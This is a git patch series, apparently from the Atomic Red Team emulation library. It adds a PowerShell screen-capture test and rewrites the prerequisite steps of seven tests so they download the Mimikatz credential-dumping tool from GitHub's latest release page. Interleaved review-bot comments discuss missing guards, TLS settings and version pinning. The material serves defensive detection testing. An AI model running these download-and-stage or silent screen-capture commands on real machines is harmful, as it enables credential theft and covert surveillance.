@@ -118,6 +118,7 @@ collection,T1113,Screen Capture,2,Screencapture (silent),deb7d358-5fbd-4dc4-aecc collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash collection,T1113,Screen Capture,4,Capture Linux Desktop using Import Tool,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash collection,T1113,Screen Capture,5,Windows Screencapture,3c898f62-626c-47d5-aad2-6de873d69153,powershell +collection,T1113,Screen Capture,6,Windows Screen Capture (CopyFromScreen),e9313014-985a-48ef-80d9-cde604ffc187,powershell privilege-escalation,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell privilege-escalation,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt privilege-escalation,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index dd925884..49009341 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -78,6 +78,7 @@ collection,T1074.001,Local Data Staging,1,Stage data from Discovery.bat,107706a5 collection,T1074.001,Local Data Staging,3,Zip a Folder with PowerShell for Staging in Temp,a57fbe4b-3440-452a-88a7-943531ac872a,powershell collection,T1114.001,Local Email Collection,1,Email Collection with PowerShell Get-Inbox,3f1b5096-0139-4736-9b78-19bcb02bb1cb,powershell collection,T1113,Screen Capture,5,Windows Screencapture,3c898f62-626c-47d5-aad2-6de873d69153,powershell +collection,T1113,Screen Capture,6,Windows Screen Capture (CopyFromScreen),e9313014-985a-48ef-80d9-cde604ffc187,powershell privilege-escalation,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell privilege-escalation,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt privilege-escalation,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 0b8ffec9..f02535b2 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -208,6 +208,7 @@ - Atomic Test #3: X Windows Capture [linux] - Atomic Test #4: Capture Linux Desktop using Import Tool [linux] - Atomic Test #5: Windows Screencapture [windows] + - Atomic Test #6: Windows Screen Capture (CopyFromScreen) [windows] - T1213.002 Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1125 Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index b4e18773..2a6a9911 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md 
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -153,6 +153,7 @@ - T1114.002 Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1113 Screen Capture](../../T1113/T1113.md) - Atomic Test #5: Windows Screencapture [windows] + - Atomic Test #6: Windows Screen Capture (CopyFromScreen) [windows] - T1213.002 Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1125 Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 4e12228a..eb30fb86 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -9132,6 +9132,31 @@ collection: cleanup_command: 'rm #{output_file} -ErrorAction Ignore ' + - name: Windows Screen Capture (CopyFromScreen) + auto_generated_guid: e9313014-985a-48ef-80d9-cde604ffc187 + description: | + Take a screen capture of the desktop through a call to the [Graphics.CopyFromScreen] .NET API. + + [Graphics.CopyFromScreen]: https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen + supported_platforms: + - windows + input_arguments: + output_file: + description: Path where captured results will be placed + type: Path + default: "$env:TEMP\\T1113.png" + executor: + command: | + Add-Type -AssemblyName System.Windows.Forms + $screen = [Windows.Forms.SystemInformation]::VirtualScreen + $bitmap = New-Object Drawing.Bitmap $screen.Width, $screen.Height + $graphic = [Drawing.Graphics]::FromImage($bitmap) + $graphic.CopyFromScreen($screen.Left, $screen.Top, 0, 0, $bitmap.Size) + $bitmap.Save("#{output_file}") + cleanup_command: 'Remove-Item #{output_file} -ErrorAction Ignore + +' + name: powershell T1213.002: technique: external_references: diff --git a/atomics/T1113/T1113.md b/atomics/T1113/T1113.md index fc466d2d..873bb64f 100644 --- a/atomics/T1113/T1113.md 
+++ b/atomics/T1113/T1113.md @@ -15,6 +15,8 @@ - [Atomic Test #5 - Windows Screencapture](#atomic-test-5---windows-screencapture) +- [Atomic Test #6 - Windows Screen Capture (CopyFromScreen)](#atomic-test-6---windows-screen-capture-copyfromscreen) +
@@ -231,4 +233,48 @@ rm #{output_file} -ErrorAction Ignore +
+
+ +## Atomic Test #6 - Windows Screen Capture (CopyFromScreen) +Take a screen capture of the desktop through a call to the [Graphics.CopyFromScreen] .NET API. + +[Graphics.CopyFromScreen]: https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen + +**Supported Platforms:** Windows + + +**auto_generated_guid:** e9313014-985a-48ef-80d9-cde604ffc187 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| output_file | Path where captured results will be placed | Path | $env:TEMP\T1113.png| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +Add-Type -AssemblyName System.Windows.Forms +$screen = [Windows.Forms.SystemInformation]::VirtualScreen +$bitmap = New-Object Drawing.Bitmap $screen.Width, $screen.Height +$graphic = [Drawing.Graphics]::FromImage($bitmap) +$graphic.CopyFromScreen($screen.Left, $screen.Top, 0, 0, $bitmap.Size) +$bitmap.Save("#{output_file}") +``` + +#### Cleanup Commands: +```powershell +Remove-Item #{output_file} -ErrorAction Ignore +``` + + + + +
From 50e36cb7e72db6f6e522e4bd7c299b91aa05564a Mon Sep 17 00:00:00 2001
From: Arioch <16936254+ZeArioch@users.noreply.github.com>
Date: Mon, 23 Aug 2021 23:08:54 +0200
Subject: [PATCH 38/39] Update hardcoded Mimikatz releases download URLs (#1604)
* update references to hardcoded mimikatz releases
* update invoke-webreauest parameters
* apply -UseBasicParsing consistently to Invoke-WebRequest calls
Co-authored-by: Carrie Roberts
---
atomics/T1003.001/T1003.001.yaml | 11 ++---------
atomics/T1003.006/T1003.006.yaml | 3 ++-
atomics/T1055/T1055.yaml | 4 ++--
atomics/T1207/T1207.yaml | 3 ++-
atomics/T1550.002/T1550.002.yaml | 3 ++-
atomics/T1550.003/T1550.003.yaml | 3 ++-
atomics/T1558.001/T1558.001.yaml | 3 ++-
7 files changed, 14 insertions(+), 16 deletions(-)
diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml
index 95a7a2f6..b3de5492 100644
--- a/atomics/T1003.001/T1003.001.yaml
+++ b/atomics/T1003.001/T1003.001.yaml
@@ -187,15 +187,8 @@ atomic_tests: if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - $url = 'https://github.com/gentilkiwi/mimikatz/releases/latest' - $request = [System.Net.WebRequest]::Create($url) - $response = $request.GetResponse() - $realTagUrl = $response.ResponseUri.OriginalString - $version = $realTagUrl.split('/')[-1] - $fileName = 'mimikatz_trunk.zip' - [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - $realDownloadUrl =$realTagUrl.Replace('tag','download') + '/' + $fileName - Invoke-WebRequest $realDownloadUrl -OutFile "$env:TEMP\Mimi.zip" + $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href + Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\Mimi.zip" Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force New-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force diff --git a/atomics/T1003.006/T1003.006.yaml b/atomics/T1003.006/T1003.006.yaml index dd51330f..172d1834 100644 --- a/atomics/T1003.006/T1003.006.yaml +++ b/atomics/T1003.006/T1003.006.yaml 
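Review bot: The new `$mimikatz_relative_uri` lookup has no guard for an empty (or multi-valued) result — if the `releases/latest` page no longer exposes exactly one link ending in `/mimikatz_trunk.zip`, the next line requests `https://github.com` itself and saves the HTML as `Mimi.zip`, and the failure only surfaces later as an unrelated `Expand-Archive` error; add `if (-not $mimikatz_relative_uri) { throw 'mimikatz_trunk.zip link not found on releases page' }` between the two lines. The same pattern is introduced in the T1003.006, T1055, T1207, T1550.002, T1550.003 and T1558.001 hunks of this patch. In the T1003.006, T1207, T1550.002, T1550.003 and T1558.001 hunks it also replaces a version-pinned download URL with the scraped `latest` link, so what the prerequisite installs now changes silently over time; if reproducibility matters, keep the release pinned or record the expected archive hash (placeholder `<EXPECTED_SHA256>`) and compare it with `Get-FileHash` before `Expand-Archive`. The `get_prereq_command` block scalar belongs to an atomic test whose definition starts outside the hunk.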
@@ -32,7 +32,8 @@ atomic_tests: if (Test-Path $mimikatz_path) {exit 0} else {exit 1} get_prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} - Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" + $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href + Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip" Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force diff --git a/atomics/T1055/T1055.yaml b/atomics/T1055/T1055.yaml index e6ecea77..03615920 100644 --- a/atomics/T1055/T1055.yaml +++ b/atomics/T1055/T1055.yaml 
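Review bot: The rewritten `get_prereq_command` here calls `Invoke-WebRequest` against GitHub without first setting `[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12`, the line the T1003.001, T1055 and T1550.003 hunks of this patch keep; on Windows PowerShell hosts whose default protocol set excludes TLS 1.2 the first request can fail before the link is even parsed. The T1207, T1550.002 and T1558.001 hunks omit it in the same way. Adding the SecurityProtocol line before the first `Invoke-WebRequest` would make all seven prerequisites behave consistently. The enclosing atomic test starts outside the hunk.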
@@ -63,8 +63,8 @@ atomic_tests: get_prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href - Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -OutFile "$env:TEMP\mimikatz.zip" + $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href + Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip" Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force diff --git a/atomics/T1207/T1207.yaml b/atomics/T1207/T1207.yaml index 7f38b3be..4e7df9db 100644 --- a/atomics/T1207/T1207.yaml +++ b/atomics/T1207/T1207.yaml 
@@ -46,7 +46,8 @@ atomic_tests: if (Test-Path $mimikatz_path) {exit 0} else {exit 1} get_prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} - Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" + $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href + Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip" Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force diff --git a/atomics/T1550.002/T1550.002.yaml b/atomics/T1550.002/T1550.002.yaml index 416e222d..2fc50b21 100644 --- a/atomics/T1550.002/T1550.002.yaml +++ b/atomics/T1550.002/T1550.002.yaml @@ -34,7 +34,8 @@ atomic_tests: if (Test-Path $mimikatz_path) {exit 0} else {exit 1} get_prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} - Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210724/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" + $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href + Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip" Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force 
diff --git a/atomics/T1550.003/T1550.003.yaml b/atomics/T1550.003/T1550.003.yaml index e3539161..4953be47 100644 --- a/atomics/T1550.003/T1550.003.yaml +++ b/atomics/T1550.003/T1550.003.yaml @@ -28,7 +28,8 @@ atomic_tests: if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\Mimi.zip" + $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href + Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\Mimi.zip" Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force New-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force diff --git a/atomics/T1558.001/T1558.001.yaml b/atomics/T1558.001/T1558.001.yaml index 883b1fd4..cf55d773 100644 --- a/atomics/T1558.001/T1558.001.yaml +++ b/atomics/T1558.001/T1558.001.yaml 
@@ -39,7 +39,8 @@ atomic_tests: if (Test-Path $mimikatz_path) {exit 0} else {exit 1} get_prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} - Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" + $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href + Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip" Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force From b10fa043d195e7682d9fbce24566630e2575e784 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Mon, 23 Aug 2021 21:09:34 +0000 Subject: [PATCH 39/39] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 40 +++++++++++++++++----------------- atomics/T1003.001/T1003.001.md | 11 ++-------- atomics/T1003.006/T1003.006.md | 3 ++- atomics/T1055/T1055.md | 4 ++-- atomics/T1207/T1207.md | 3 ++- atomics/T1550.002/T1550.002.md | 3 ++- atomics/T1550.003/T1550.003.md | 3 ++- atomics/T1558.001/T1558.001.md | 3 ++- 8 files changed, 34 insertions(+), 36 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index eb30fb86..93d419bd 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -1584,7 +1584,8 @@ credential-access: if (Test-Path $mimikatz_path) {exit 0} else {exit 1} get_prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} - Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" + $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href + Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip" Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force @@ -2071,7 +2072,8 @@ credential-access: if (Test-Path $mimikatz_path) {exit 0} else {exit 1} get_prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} - Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip" + $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href + Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip" Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force 
@@ -3149,15 +3151,8 @@ credential-access:
 '
 get_prereq_command: |
 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
- $url = 'https://github.com/gentilkiwi/mimikatz/releases/latest'
- $request = [System.Net.WebRequest]::Create($url)
- $response = $request.GetResponse()
- $realTagUrl = $response.ResponseUri.OriginalString
- $version = $realTagUrl.split('/')[-1]
- $fileName = 'mimikatz_trunk.zip'
- [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
- $realDownloadUrl =$realTagUrl.Replace('tag','download') + '/' + $fileName
- Invoke-WebRequest $realDownloadUrl -OutFile "$env:TEMP\Mimi.zip"
+ $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+ Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\Mimi.zip"
 Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force
 New-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null
 Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force
@@ -15926,8 +15921,8 @@ privilege-escalation:
 get_prereq_command: |
 $mimikatz_path = cmd /c echo #{mimikatz_path}
 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
- $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
- Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -OutFile "$env:TEMP\mimikatz.zip"
+ $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+ Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
 Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
 New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
 Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
@@ -30812,7 +30807,8 @@ defense-evasion:
 if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
 get_prereq_command: |
 $mimikatz_path = cmd /c echo #{mimikatz_path}
- Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210724/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+ $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+ Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
 Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
 New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
 Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
@@ -30971,7 +30967,8 @@ defense-evasion:
 '
 get_prereq_command: |
 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
- Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\Mimi.zip"
+ $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+ Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\Mimi.zip"
 Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force
 New-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null
 Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force
@@ -32102,8 +32099,8 @@ defense-evasion:
 get_prereq_command: |
 $mimikatz_path = cmd /c echo #{mimikatz_path}
 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
- $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
- Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -OutFile "$env:TEMP\mimikatz.zip"
+ $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+ Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
 Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
 New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
 Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
@@ -33293,7 +33290,8 @@ defense-evasion:
 if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
 get_prereq_command: |
 $mimikatz_path = cmd /c echo #{mimikatz_path}
- Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+ $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+ Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
 Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
 New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
 Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
@@ -63421,7 +63419,8 @@ lateral-movement:
 if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
 get_prereq_command: |
 $mimikatz_path = cmd /c echo #{mimikatz_path}
- Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210724/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+ $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+ Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
 Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
 New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
 Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
@@ -63580,7 +63579,8 @@ lateral-movement:
 '
 get_prereq_command: |
 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
- Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\Mimi.zip"
+ $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+ Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\Mimi.zip"
 Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force
 New-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null
 Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force
diff --git a/atomics/T1003.001/T1003.001.md b/atomics/T1003.001/T1003.001.md
index 024dd2aa..48a2cc91 100644
--- a/atomics/T1003.001/T1003.001.md
+++ b/atomics/T1003.001/T1003.001.md
@@ -340,15 +340,8 @@ if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
 ##### Get Prereq Commands:
 ```powershell
 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-$url = 'https://github.com/gentilkiwi/mimikatz/releases/latest'
-$request = [System.Net.WebRequest]::Create($url)
-$response = $request.GetResponse()
-$realTagUrl = $response.ResponseUri.OriginalString
-$version = $realTagUrl.split('/')[-1]
-$fileName = 'mimikatz_trunk.zip'
-[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-$realDownloadUrl =$realTagUrl.Replace('tag','download') + '/' + $fileName
-Invoke-WebRequest $realDownloadUrl -OutFile "$env:TEMP\Mimi.zip"
+$mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
